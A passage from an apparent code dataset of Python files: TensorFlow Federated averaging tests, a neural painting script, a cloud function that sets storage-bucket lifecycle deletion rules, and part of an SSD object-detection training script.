----------------------------------------------------------------------\n # abstracts\n\n def _update_inplace(self, result, verify_is_copy=True, **kwargs):\n raise AbstractMethodError(self)\n"} {"ext": "py", "sha": "1a2f9090d50fcfe7a07ab9ca7cee5c030f101b59", "content": "# Lint as: python3\n# Copyright 2018, The TensorFlow Federated Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for learning.federated_averaging.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\n\nfrom absl.testing import parameterized\nimport numpy as np\nfrom six.moves import range\nimport tensorflow as tf\n\nfrom tensorflow_federated.python.common_libs import test\nfrom tensorflow_federated.python.learning import federated_averaging\nfrom tensorflow_federated.python.learning import keras_utils\nfrom tensorflow_federated.python.learning import model_examples\nfrom tensorflow_federated.python.learning import model_utils\n\n\nclass FederatedAveragingClientTest(test.TestCase, parameterized.TestCase):\n \"\"\"Tests of ClientFedAvg that use a common model and data.\"\"\"\n\n def dataset(self):\n # Create a dataset with 4 examples:\n dataset = tf.data.Dataset.from_tensor_slices(\n model_examples.TrainableLinearRegression.make_batch(\n x=[[0.0, 0.0], [1.0, 0.0], [2.0, 0.0], [3.0, 0.0]],\n y=[[0.0], [0.0], [1.0], [1.0]]))\n # Repeat the dataset 2 times with batches of 3 examples,\n # producing 3 minibatches (the last one with only 2 examples).\n # Note that `batch` is required for this dataset to be useable,\n # as it adds the batch dimension which is expected by the model.\n return dataset.repeat(2).batch(3)\n\n def model(self):\n return model_examples.TrainableLinearRegression(feature_dim=2)\n\n def initial_weights(self):\n return model_utils.ModelWeights(\n trainable={\n 'a': tf.constant([[0.0], [0.0]]),\n 'b': tf.constant(0.0)\n },\n non_trainable={'c': 0.0})\n\n @test.graph_mode_test\n def test_client_tf(self):\n model = self.model()\n dataset = self.dataset()\n client_tf = federated_averaging.ClientFedAvg(model)\n init_op = tf.group(\n model_utils.model_initializer(model),\n tf.compat.v1.initializers.variables(client_tf.variables),\n name='fedavg_initializer')\n client_outputs = client_tf(dataset, self.initial_weights())\n\n tf.compat.v1.get_default_graph().finalize()\n with self.session() as sess:\n sess.run(init_op)\n out = sess.run(client_outputs)\n\n # Both trainable parameters should have been updated,\n # and we don't return the non-trainable 'c'.\n self.assertCountEqual(['a', 'b'], list(out.weights_delta.keys()))\n self.assertGreater(np.linalg.norm(out.weights_delta['a']), 0.1)\n self.assertGreater(np.linalg.norm(out.weights_delta['b']), 0.1)\n self.assertEqual(out.weights_delta_weight, 8.0)\n self.assertEqual(out.optimizer_output['num_examples'], 8)\n self.assertEqual(out.optimizer_output['has_non_finite_delta'], 0)\n\n self.assertEqual(out.model_output['num_examples'], 8)\n 
self.assertEqual(out.model_output['num_batches'], 3)\n self.assertBetween(out.model_output['loss'],\n np.finfo(np.float32).eps, 10.0)\n\n def test_client_tf_custom_delta_weight(self):\n model = self.model()\n dataset = self.dataset()\n client_tf = federated_averaging.ClientFedAvg(\n model, client_weight_fn=lambda _: tf.constant(1.5))\n out = client_tf(dataset, self.initial_weights())\n self.assertEqual(self.evaluate(out.weights_delta_weight), 1.5)\n\n @parameterized.named_parameters(('_inf', np.inf), ('_nan', np.nan))\n def test_non_finite_aggregation(self, bad_value):\n model = self.model()\n dataset = self.dataset()\n client_tf = federated_averaging.ClientFedAvg(model)\n init_weights = self.initial_weights()\n init_weights.trainable['b'] = bad_value\n out = client_tf(dataset, init_weights)\n self.assertEqual(self.evaluate(out.weights_delta_weight), 0.0)\n self.assertAllClose(\n self.evaluate(out.weights_delta['a']), np.array([[0.0], [0.0]]))\n self.assertAllClose(self.evaluate(out.weights_delta['b']), 0.0)\n self.assertEqual(\n self.evaluate(out.optimizer_output['has_non_finite_delta']), 1)\n\n\nclass FederatedAveragingTffTest(test.TestCase, parameterized.TestCase):\n\n def test_orchestration_execute(self):\n iterative_process = federated_averaging.build_federated_averaging_process(\n model_fn=model_examples.TrainableLinearRegression)\n\n ds = tf.data.Dataset.from_tensor_slices({\n 'x': [[1., 2.], [3., 4.]],\n 'y': [[5.], [6.]]\n }).batch(2)\n\n federated_ds = [ds] * 3\n\n server_state = iterative_process.initialize()\n\n prev_loss = np.inf\n for _ in range(3):\n server_state, metric_outputs = iterative_process.next(\n server_state, federated_ds)\n self.assertEqual(metric_outputs.num_examples, 2 * len(federated_ds))\n self.assertLess(metric_outputs.loss, prev_loss)\n prev_loss = metric_outputs.loss\n\n @parameterized.named_parameters([\n ('functional_model',\n model_examples.build_linear_regresion_keras_functional_model),\n ('sequential_model',\n model_examples.build_linear_regresion_keras_sequential_model),\n ('subclass_model',\n model_examples.build_linear_regresion_keras_subclass_model),\n ])\n def test_orchestration_execute_from_keras(self, build_keras_model_fn):\n dummy_batch = collections.OrderedDict([\n ('x', np.zeros([1, 2], np.float32)),\n ('y', np.zeros([1, 1], np.float32)),\n ])\n\n def model_fn():\n keras_model = build_keras_model_fn(feature_dims=2)\n keras_model.compile(\n optimizer=tf.keras.optimizers.SGD(learning_rate=0.01),\n loss=tf.keras.losses.MeanSquaredError(),\n metrics=[])\n return keras_utils.from_compiled_keras_model(keras_model, dummy_batch)\n\n iterative_process = federated_averaging.build_federated_averaging_process(\n model_fn=model_fn)\n\n ds = tf.data.Dataset.from_tensor_slices({\n 'x': [[1., 2.], [3., 4.]],\n 'y': [[5.], [6.]]\n }).batch(2)\n federated_ds = [ds] * 3\n\n server_state = iterative_process.initialize()\n\n prev_loss = np.inf\n for _ in range(3):\n server_state, metrics = iterative_process.next(server_state, federated_ds)\n self.assertLess(metrics.loss, prev_loss)\n prev_loss = metrics.loss\n\n def test_execute_empty_data(self):\n iterative_process = federated_averaging.build_federated_averaging_process(\n model_fn=model_examples.TrainableLinearRegression)\n\n # Results in empty dataset with correct types and shapes.\n ds = tf.data.Dataset.from_tensor_slices({\n 'x': [[1., 2.]],\n 'y': [[5.]]\n }).batch(\n 5, drop_remainder=True)\n\n federated_ds = [ds] * 2\n\n server_state = iterative_process.initialize()\n\n first_state, metric_outputs = 
iterative_process.next(\n server_state, federated_ds)\n self.assertEqual(\n self.evaluate(tf.reduce_sum(first_state.model.trainable.a)) +\n self.evaluate(tf.reduce_sum(first_state.model.trainable.b)), 0)\n self.assertEqual(metric_outputs.num_examples, 0)\n self.assertTrue(tf.is_nan(metric_outputs.loss))\n\n\nif __name__ == '__main__':\n test.main()\n"} {"ext": "py", "sha": "1a2f909b91141d5fec10bc94b3f409d2e950c3dd", "content": "import argparse\r\n\r\nimport torch\r\ntorch.cuda.current_device()\r\nimport torch.optim as optim\r\n\r\nfrom painter import *\r\n\r\n# settings\r\nparser = argparse.ArgumentParser(description='STYLIZED NEURAL PAINTING')\r\nparser.add_argument('--img_path', type=str, default='./test_images/sunflowers.jpg', metavar='str',\r\n help='path to test image (default: ./test_images/sunflowers.jpg)')\r\nparser.add_argument('--renderer', type=str, default='rectangle', metavar='str',\r\n help='renderer: [watercolor, markerpen, oilpaintbrush, rectangle (default oilpaintbrush)')\r\nparser.add_argument('--canvas_color', type=str, default='black', metavar='str',\r\n help='canvas_color: [black, white] (default black)')\r\nparser.add_argument('--canvas_size', type=int, default=512, metavar='str',\r\n help='size ( max(w, h) ) of the canvas for stroke rendering')\r\nparser.add_argument('--max_m_strokes', type=int, default=500, metavar='str',\r\n help='max number of strokes (default 500)')\r\nparser.add_argument('--max_divide', type=int, default=5, metavar='N',\r\n help='divide an image up-to max_divide x max_divide patches (default 5)')\r\nparser.add_argument('--beta_L1', type=float, default=1.0,\r\n help='weight for L1 loss (default: 1.0)')\r\nparser.add_argument('--with_ot_loss', action='store_true', default=False,\r\n help='imporve the convergence by using optimal transportation loss')\r\nparser.add_argument('--beta_ot', type=float, default=0.1,\r\n help='weight for optimal transportation loss (default: 0.1)')\r\nparser.add_argument('--net_G', type=str, default='zou-fusion-net', metavar='str',\r\n help='net_G: plain-dcgan, plain-unet, huang-net, or zou-fusion-net (default: zou-fusion-net)')\r\nparser.add_argument('--renderer_checkpoint_dir', type=str, default=r'./checkpoints_G_rectangle', metavar='str',\r\n help='dir to load neu-renderer (default: ./checkpoints_G_rectangle)')\r\nparser.add_argument('--lr', type=float, default=0.005,\r\n help='learning rate for stroke searching (default: 0.005)')\r\nparser.add_argument('--output_dir', type=str, default=r'./output', metavar='str',\r\n help='dir to save painting results (default: ./output)')\r\nparser.add_argument('--disable_preview', action='store_true', default=False,\r\n help='disable cv2.imshow, for running remotely without x-display')\r\nargs = parser.parse_args()\r\n\r\n\r\n# Decide which device we want to run on\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef optimize_x(pt):\r\n\r\n pt._load_checkpoint()\r\n pt.net_G.eval()\r\n\r\n print('begin drawing...')\r\n\r\n PARAMS = np.zeros([1, 0, pt.rderr.d], np.float32)\r\n\r\n if pt.rderr.canvas_color == 'white':\r\n CANVAS_tmp = torch.ones([1, 3, 128, 128]).to(device)\r\n else:\r\n CANVAS_tmp = torch.zeros([1, 3, 128, 128]).to(device)\r\n\r\n for pt.m_grid in range(1, pt.max_divide + 1):\r\n\r\n pt.img_batch = utils.img2patches(pt.img_, pt.m_grid).to(device)\r\n pt.G_final_pred_canvas = CANVAS_tmp\r\n\r\n pt.initialize_params()\r\n pt.x_ctt.requires_grad = True\r\n pt.x_color.requires_grad = True\r\n pt.x_alpha.requires_grad = True\r\n 
utils.set_requires_grad(pt.net_G, False)\r\n\r\n pt.optimizer_x = optim.RMSprop([pt.x_ctt, pt.x_color, pt.x_alpha], lr=pt.lr, centered=True)\r\n\r\n pt.step_id = 0\r\n for pt.anchor_id in range(0, pt.m_strokes_per_block):\r\n pt.stroke_sampler(pt.anchor_id)\r\n iters_per_stroke = 20\r\n for i in range(iters_per_stroke):\r\n pt.G_pred_canvas = CANVAS_tmp\r\n\r\n # update x\r\n pt.optimizer_x.zero_grad()\r\n\r\n pt.x_ctt.data = torch.clamp(pt.x_ctt.data, 0, 1)\r\n pt.x_ctt.data[:, :, -1] = torch.clamp(pt.x_ctt.data[:, :, -1], 0, 0)\r\n pt.x_color.data = torch.clamp(pt.x_color.data, 0, 1)\r\n pt.x_alpha.data = torch.clamp(pt.x_alpha.data, 1, 1)\r\n\r\n pt._forward_pass()\r\n pt._backward_x()\r\n\r\n pt.x_ctt.data = torch.clamp(pt.x_ctt.data, 0, 1)\r\n pt.x_ctt.data[:, :, -1] = torch.clamp(pt.x_ctt.data[:, :, -1], 0, 0)\r\n pt.x_color.data = torch.clamp(pt.x_color.data, 0, 1)\r\n pt.x_alpha.data = torch.clamp(pt.x_alpha.data, 1, 1)\r\n\r\n pt._drawing_step_states()\r\n\r\n pt.optimizer_x.step()\r\n pt.step_id += 1\r\n\r\n v = pt._normalize_strokes(pt.x)\r\n PARAMS = np.concatenate([PARAMS, np.reshape(v, [1, -1, pt.rderr.d])], axis=1)\r\n CANVAS_tmp = pt._render(PARAMS)[-1]\r\n CANVAS_tmp = utils.img2patches(CANVAS_tmp, pt.m_grid + 1, to_tensor=True).to(device)\r\n\r\n pt._save_stroke_params(PARAMS)\r\n pt.final_rendered_images = pt._render(PARAMS)\r\n pt._save_rendered_images()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n pt = ProgressivePainter(args=args)\r\n optimize_x(pt)\r\n\r\n"} {"ext": "py", "sha": "1a2f91338b1ffe8f2c40042e4495be5c90c79ac7", "content": "import base64\nimport json\nimport os\nimport sys\nimport re\nfrom logging import getLogger, StreamHandler, INFO\nfrom google.cloud import storage\n\nage = os.environ.get('LIFECYCLE_EXPIRE')\nignorePatterns = os.environ.get('IGNORE_PATTERNS')\n\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setLevel(INFO)\nlogger.setLevel(INFO)\nlogger.addHandler(handler)\nlogger.propagate = False\n\ndef get_gcs_bucket_name(pubsub_message):\n proto_payload = pubsub_message.get(u'protoPayload')\n if proto_payload is None or len(proto_payload) == 0:\n return None\n resource_name = proto_payload.get(u'resourceName')\n if resource_name is None or len(resource_name) == 0:\n return None\n return resource_name.split('/')[3]\n\ndef get_project_id(pubsub_message):\n resource = pubsub_message.get(u'resource')\n if resource is None or len(resource) == 0:\n return None\n labels = resource.get(u'labels')\n if labels is None or len(labels) == 0:\n return None\n project_id = labels.get(u'project_id')\n if project_id is None or len(project_id) == 0:\n return None\n return project_id\n\n# Add lifecycle rule which deletes object after 365 days\ndef enable_bucket_lifecycle(bucket_name):\n client = storage.Client()\n bucket = client.get_bucket(bucket_name)\n bucket.add_lifecycle_delete_rule(age=age)\n bucket.patch()\n logger.info(\"Lifecycle addition is complete.\")\n\ndef main_handler(event, context):\n pubsub_message = json.loads(base64.b64decode(event['data']).decode('utf-8'))\n bucket_name = get_gcs_bucket_name(pubsub_message)\n if bucket_name is None:\n logger.error(\"Could not get the bucket name from the event data.\")\n return\n logger.info(\"Bucket: %s\" % bucket_name)\n\n project_id = get_project_id(pubsub_message)\n if project_id is None:\n logger.warning(\"Could not get the project id from the event data.\")\n logger.info(\"Project id: %s\" % project_id)\n\n for ignorePattern in ignorePatterns.split('###'):\n try:\n if 
re.match(ignorePattern, bucket_name):\n logger.info(\"Since it is included in ignorePattern '%s', it does not set the life cycle.\" % ignorePattern)\n return\n except re.error as regex_error:\n logger.warning(\"The grammar expression '%s' has an error : %s\" % (ignorePattern, regex_error))\n\n enable_bucket_lifecycle(bucket_name)\n\n# debug\nif __name__ == '__main__':\n f = open(\"event_sample.json\", \"r\", encoding=\"utf-8\")\n event = json.load(f)\n f.close()\n context = ''\n age = '365'\n ignorePatterns = '.*.appspot.com###gcf-sources*'\n main_handler(event, context)\n"} {"ext": "py", "sha": "1a2f91c7e1dddad4cd9de82ccc1d958cc1266038", "content": "# Copyright 2018 Changan Wang\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# =============================================================================\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport tensorflow as tf\n\nfrom model import ssd_net_resnet34_large \nfrom dataset import dataset_common\nfrom utils import ssd_preprocessing\nfrom utils import anchor_manipulator\nfrom utils import scaffolds\n\ntf.app.flags.DEFINE_integer(\n 'num_readers', 8,\n 'The number of parallel readers that read data from the dataset.')\ntf.app.flags.DEFINE_integer(\n 'num_preprocessing_threads', 24,\n 'The number of threads used to create the batches.')\ntf.app.flags.DEFINE_integer(\n 'num_cpu_threads', 0,\n 'The number of cpu cores used to train.')\ntf.app.flags.DEFINE_float(\n 'gpu_memory_fraction', 1., 'GPU memory fraction to use.')\ntf.app.flags.DEFINE_string(\n 'data_dir', './tfrecords/',\n 'The directory where the dataset input data is stored.')\ntf.app.flags.DEFINE_integer(\n 'num_classes', 81, 'Number of classes to use in the dataset.')\ntf.app.flags.DEFINE_string(\n 'model_dir', './logs_mine_sec.ssd_resnet34_pretrain.no-bn_in_ssd_block_3*3_map/',\n 'The directory where the model will be stored.')\ntf.app.flags.DEFINE_integer(\n 'log_every_n_steps', 10,\n 'The frequency with which logs are printed.')\ntf.app.flags.DEFINE_integer(\n 'save_summary_steps', 500,\n 'The frequency with which summaries are saved, in seconds.')\ntf.app.flags.DEFINE_integer(\n 'save_checkpoints_secs', 3600,\n 'The frequency with which the model is saved, in seconds.')\ntf.app.flags.DEFINE_integer(\n 'train_image_size', 1200,\n 'The size of the input image for the model to use.')\ntf.app.flags.DEFINE_integer(\n 'train_epochs', None,\n 'The number of epochs to use for training.')\ntf.app.flags.DEFINE_integer(\n 'max_number_of_steps', 840000,\n 'The max number of steps to use for training.')\ntf.app.flags.DEFINE_integer(\n 'batch_size', 48,\n 'Batch size for training and evaluation.')\ntf.app.flags.DEFINE_string(\n 'data_format', 'channels_first',\n 'A flag to override the data format used in the model. channels_first '\n 'provides a performance boost on GPU but is not always compatible '\n 'with CPU. 
If left unspecified, the data format will be chosen '\n 'automatically based on whether TensorFlow was built for CPU or GPU.')\ntf.app.flags.DEFINE_float(\n 'negative_ratio', 3., 'Negative ratio in the loss function.')\ntf.app.flags.DEFINE_float(\n 'match_threshold', 0.5, 'Matching threshold in the loss function.')\ntf.app.flags.DEFINE_float(\n 'neg_threshold', 0.5, 'Matching threshold for the negtive examples in the loss function.')\ntf.app.flags.DEFINE_integer(\n 'tf_random_seed', 20180503, 'Random seed for TensorFlow initializers.')\ntf.app.flags.DEFINE_float(\n 'weight_decay', 5e-4, 'The weight decay on the model weights.')\ntf.app.flags.DEFINE_float(\n 'momentum', 0.9,\n 'The momentum for the MomentumOptimizer and RMSPropOptimizer.')\ntf.app.flags.DEFINE_float('learning_rate', 4e-3, 'Initial learning rate.')\ntf.app.flags.DEFINE_float(\n 'end_learning_rate', 0.000001,\n 'The minimal end learning rate used by a polynomial decay learning rate.')\ntf.app.flags.DEFINE_string(\n 'decay_boundaries', '6000, 26000, 40000, 60000, 79000, 795000, 815000',\n 'Learning rate decay boundaries by global_step (comma-separated list).')\ntf.app.flags.DEFINE_string(\n 'lr_decay_factors', '0.001, 0.01, 0.04, 0.001, 0.001, 0.001, 0.01, 0.001',\n 'The values of learning_rate decay factor for each segment between boundaries (comma-separated list).')\ntf.app.flags.DEFINE_string(\n 'checkpoint_path', './logs_mine_sec.ssd_resnet34_pretrain.no-bn_in_ssd_block.21.1/model.ckpt-99590',\n 'The path to a checkpoint from which to fine-tune.')\ntf.app.flags.DEFINE_string(\n 'checkpoint_model_scope', 'ssd1200',\n 'Model scope in the checkpoint. None if the same as the trained model.')\ntf.app.flags.DEFINE_string(\n 'model_scope', 'ssd1200',\n 'Model scope name used to replace the name_scope in checkpoint.')\ntf.app.flags.DEFINE_string(\n 'checkpoint_exclude_scopes', '',\n 'Comma-separated list of scopes of variables to exclude when restoring from a checkpoint.')\ntf.app.flags.DEFINE_boolean(\n 'ignore_missing_vars', True,\n 'When restoring a checkpoint would ignore missing variables.')\ntf.app.flags.DEFINE_boolean(\n 'multi_gpu', True,\n 'Whether there is GPU to use for training.')\nFLAGS = tf.app.flags.FLAGS\n\ndef validate_batch_size_for_multi_gpu(batch_size):\n \"\"\"For multi-gpu, batch-size must be a multiple of the number of\n available GPUs.\n Note that this should eventually be handled by replicate_model_fn\n directly. Multi-GPU support is currently experimental, however,\n so doing the work here until that feature is in place.\n \"\"\"\n if FLAGS.multi_gpu:\n from tensorflow.python.client import device_lib\n local_device_protos = device_lib.list_local_devices()\n num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU'])\n if not num_gpus:\n raise ValueError('Multi-GPU mode was specified, but no GPUs '\n 'were found. To use CPU, run --multi_gpu=False.')\n remainder = batch_size % num_gpus\n if remainder:\n err = ('When running with multiple GPUs, batch size '\n 'must be a multiple of the number of available GPUs. 
'\n 'Found {} GPUs with a batch size of {}; try --batch_size={} instead.'\n ).format(num_gpus, batch_size, batch_size - remainder)\n raise ValueError(err)\n return num_gpus\n return 0\n\ndef get_init_fn():\n return scaffolds.get_init_fn_for_scaffold(FLAGS.model_dir, FLAGS.checkpoint_path,\n FLAGS.model_scope, FLAGS.checkpoint_model_scope,\n FLAGS.checkpoint_exclude_scopes, FLAGS.ignore_missing_vars,\n name_remap=None)#{'/kernel': '/weights', '/bias': '/biases'})\nglobal_anchor_info = dict()\n\ndef input_pipeline(dataset_pattern='pascalvoc_0712_train_*', is_training=True, batch_size=FLAGS.batch_size):\n def input_fn():\n out_shape = [FLAGS.train_image_size] * 2\n anchor_creator = anchor_manipulator.AnchorCreator(out_shape,\n layers_shapes = [(50, 50), (25, 25), (13, 13), (7, 7), (3, 3), (3, 3)],\n anchor_scales = [(0.1,), (0.2,), (0.375,), (0.55,), (0.725,), (0.9,)],\n extra_anchor_scales = [(0.1414,), (0.2739,), (0.4541,), (0.6315,), (0.8078,), (0.9836,)],\n anchor_ratios = [(1., 2., .5), (1., 2., 3., .5, 0.3333), (1., 2., 3., .5, 0.3333), (1., 2., 3., .5, 0.3333), (1., 2., .5), (1., 2., .5)],\n layer_steps = [24, 48, 92, 171, 400, 400])\n all_anchors, all_num_anchors_depth, all_num_anchors_spatial = anchor_creator.get_all_anchors()\n num_anchors_per_layer = []\n for ind in range(len(all_anchors)):\n num_anchors_per_layer.append(all_num_anchors_depth[ind] * all_num_anchors_spatial[ind])\n anchor_encoder_decoder = anchor_manipulator.AnchorEncoder(allowed_borders = [1.0] * 6,\n positive_threshold = FLAGS.match_threshold,\n ignore_threshold = FLAGS.neg_threshold,\n prior_scaling=[0.1, 0.1, 0.2, 0.2])\n\n image_preprocessing_fn = lambda image_, labels_, bboxes_ : ssd_preprocessing.preprocess_image(image_, labels_, bboxes_, out_shape, is_training=is_training, data_format=FLAGS.data_format, output_rgb=False)\n anchor_encoder_fn = lambda glabels_, gbboxes_: anchor_encoder_decoder.encode_all_anchors(glabels_, gbboxes_, all_anchors, all_num_anchors_depth, all_num_anchors_spatial)\n image, _, shape, loc_targets, cls_targets, match_scores = dataset_common.slim_get_batch(FLAGS.num_classes,\n batch_size,\n ('train' if is_training else 'val'),\n os.path.join(FLAGS.data_dir, dataset_pattern),\n FLAGS.num_readers,\n FLAGS.num_preprocessing_threads,\n image_preprocessing_fn,\n anchor_encoder_fn,\n num_epochs=FLAGS.train_epochs,\n is_training=is_training)\n global global_anchor_info\n global_anchor_info = {'decode_fn': lambda pred : anchor_encoder_decoder.decode_all_anchors(pred, num_anchors_per_layer),\n 'num_anchors_per_layer': num_anchors_per_layer,\n 'all_num_anchors_depth': all_num_anchors_depth }\n return image, {'shape': shape, 'loc_targets': loc_targets, 'cls_targets': cls_targets, 'match_scores': match_scores}\n return input_fn\n\ndef modified_smooth_l1(bbox_pred, bbox_targets, bbox_inside_weights=1., bbox_outside_weights=1., sigma=1.):\n with tf.name_scope('smooth_l1', [bbox_pred, bbox_targets]):\n sigma2 = sigma * sigma\n inside_mul = tf.multiply(bbox_inside_weights, tf.subtract(bbox_pred, bbox_targets))\n smooth_l1_sign = tf.cast(tf.less(tf.abs(inside_mul), 1.0 / sigma2), tf.float32)\n smooth_l1_option1 = tf.multiply(tf.multiply(inside_mul, inside_mul), 0.5 * sigma2)\n smooth_l1_option2 = tf.subtract(tf.abs(inside_mul), 0.5 / sigma2)\n smooth_l1_result = tf.add(tf.multiply(smooth_l1_option1, smooth_l1_sign),\n tf.multiply(smooth_l1_option2, tf.abs(tf.subtract(smooth_l1_sign, 1.0))))\n outside_mul = tf.multiply(bbox_outside_weights, smooth_l1_result)\n return outside_mul\n\ndef 
ssd_model_fn(features, labels, mode, params):\n shape = labels['shape']\n loc_targets = labels['loc_targets']\n cls_targets = labels['cls_targets']\n match_scores = labels['match_scores']\n print('loc_targets:', loc_targets)\n print('cls_targets:', cls_targets)\n global global_anchor_info\n decode_fn = global_anchor_info['decode_fn']\n num_anchors_per_layer = global_anchor_info['num_anchors_per_layer']\n all_num_anchors_depth = global_anchor_info['all_num_anchors_depth']\n\n with tf.variable_scope(params['model_scope'], default_name=None, values=[features], reuse=tf.AUTO_REUSE):\n backbone = ssd_net_resnet34_large.Resnet34Backbone(params['data_format'])\n feature_layers = backbone.forward(features, training=(mode == tf.estimator.ModeKeys.TRAIN))\n location_pred, cls_pred = ssd_net_resnet34_large.multibox_head(feature_layers, params['num_classes'], all_num_anchors_depth, data_format=params['data_format'], strides=(3, 3))\n print(location_pred, cls_pred)\n if params['data_format'] == 'channels_first':\n cls_pred = [tf.transpose(pred, [0, 2, 3, 1]) for pred in cls_pred]\n location_pred = [tf.transpose(pred, [0, 2, 3, 1]) for pred in location_pred]\n\n cls_pred = [tf.reshape(pred, [tf.shape(features)[0], -1, params['num_classes']]) for pred in cls_pred]\n location_pred = [tf.reshape(pred, [tf.shape(features)[0], -1, 4]) for pred in location_pred]\n cls_pred = tf.concat(cls_pred, axis=1)\n location_pred = tf.concat(location_pred, axis=1)\n cls_pred = tf.reshape(cls_pred, [-1, params['num_classes']])\n location_pred = tf.reshape(location_pred, [-1, 4])\n\n with tf.device('/cpu:0'):\n with tf.control_dependencies([cls_pred, location_pred]):\n with tf.name_scope('post_forward'):\n #bboxes_pred = decode_fn(location_pred)\n bboxes_pred = tf.map_fn(lambda _preds : decode_fn(_preds),\n tf.reshape(location_pred, [tf.shape(features)[0], -1, 4]),\n dtype=[tf.float32] * len(num_anchors_per_layer), back_prop=False)\n #cls_targets = tf.Print(cls_targets, [tf.shape(bboxes_pred[0]),tf.shape(bboxes_pred[1]),tf.shape(bboxes_pred[2]),tf.shape(bboxes_pred[3])])\n bboxes_pred = [tf.reshape(preds, [-1, 4]) for preds in bboxes_pred]\n bboxes_pred = tf.concat(bboxes_pred, axis=0)\n\n flaten_cls_targets = tf.reshape(cls_targets, [-1])\n flaten_match_scores = tf.reshape(match_scores, [-1])\n flaten_loc_targets = tf.reshape(loc_targets, [-1, 4])\n\n # each positive examples has one label\n positive_mask = flaten_cls_targets > 0\n n_positives = tf.count_nonzero(positive_mask)\n\n batch_n_positives = tf.count_nonzero(cls_targets, -1)\n\n batch_negtive_mask = tf.equal(cls_targets, 0)#tf.logical_and(tf.equal(cls_targets, 0), match_scores > 0.)\n batch_n_negtives = tf.count_nonzero(batch_negtive_mask, -1)\n\n batch_n_neg_select = tf.cast(params['negative_ratio'] * tf.cast(batch_n_positives, tf.float32), tf.int32)\n batch_n_neg_select = tf.minimum(batch_n_neg_select, tf.cast(batch_n_negtives, tf.int32))\n\n # hard negative mining for classification\n predictions_for_bg = tf.nn.softmax(tf.reshape(cls_pred, [tf.shape(features)[0], -1, params['num_classes']]))[:, :, 0]\n prob_for_negtives = tf.where(batch_negtive_mask,\n 0. - predictions_for_bg,\n # ignore all the positives\n 0. 
- tf.ones_like(predictions_for_bg))\n topk_prob_for_bg, _ = tf.nn.top_k(prob_for_negtives, k=tf.shape(prob_for_negtives)[1])\n score_at_k = tf.gather_nd(topk_prob_for_bg, tf.stack([tf.range(tf.shape(features)[0]), batch_n_neg_select - 1], axis=-1))\n\n selected_neg_mask = prob_for_negtives >= tf.expand_dims(score_at_k, axis=-1)\n\n # include both selected negtive and all positive examples\n final_mask = tf.stop_gradient(tf.logical_or(tf.reshape(tf.logical_and(batch_negtive_mask, selected_neg_mask), [-1]), positive_mask))\n total_examples = tf.count_nonzero(final_mask)\n\n cls_pred = tf.boolean_mask(cls_pred, final_mask)\n location_pred = tf.boolean_mask(location_pred, tf.stop_gradient(positive_mask))\n flaten_cls_targets = tf.boolean_mask(tf.clip_by_value(flaten_cls_targets, 0, params['num_classes']), final_mask)\n flaten_loc_targets = tf.stop_gradient(tf.boolean_mask(flaten_loc_targets, positive_mask))\n\n predictions = {\n 'classes': tf.argmax(cls_pred, axis=-1),\n 'probabilities': tf.reduce_max(tf.nn.softmax(cls_pred, name='softmax_tensor'), axis=-1),\n 'loc_predict': bboxes_pred }\n\n cls_accuracy = tf.metrics.accuracy(flaten_cls_targets, predictions['classes'])\n metrics = {'cls_accuracy': cls_accuracy}\n\n # Create a tensor named train_accuracy for logging purposes.\n tf.identity(cls_accuracy[1], name='cls_accuracy')\n tf.summary.scalar('cls_accuracy', cls_accuracy[1])\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n #flaten_cls_targets=tf.Print(flaten_cls_targets, [flaten_loc_targets],summarize=50000)\n cross_entropy = tf.losses.sparse_softmax_cross_entropy(labels=flaten_cls_targets, logits=cls_pred) * (params['negative_ratio'] + 1.)\n # Create a tensor named cross_entropy for logging purposes.\n tf.identity(cross_entropy, name='cross_entropy_loss')\n tf.summary.scalar('cross_entropy_loss', cross_entropy)\n\n #loc_loss = tf.cond(n_positives > 0, lambda: modified_smooth_l1(location_pred, tf.stop_gradient(flaten_loc_targets), sigma=1.), lambda: tf.zeros_like(location_pred))\n loc_loss = modified_smooth_l1(location_pred, flaten_loc_targets, sigma=1.)\n #loc_loss = modified_smooth_l1(location_pred, tf.stop_gradient(gtargets))\n loc_loss = tf.reduce_mean(tf.reduce_sum(loc_loss, axis=-1), name='location_loss')\n tf.summary.scalar('location_loss', loc_loss)\n tf.losses.add_loss(loc_loss)\n\n l2_loss_vars = []\n for trainable_var in tf.trainable_variables():\n if '_bn' not in trainable_var.name:\n if 'conv4_3_scale' not in trainable_var.name:\n l2_loss_vars.append(tf.nn.l2_loss(trainable_var) * 0.1)\n else:\n l2_loss_vars.append(tf.nn.l2_loss(trainable_var) * 0.1)\n # Add weight decay to the loss. 
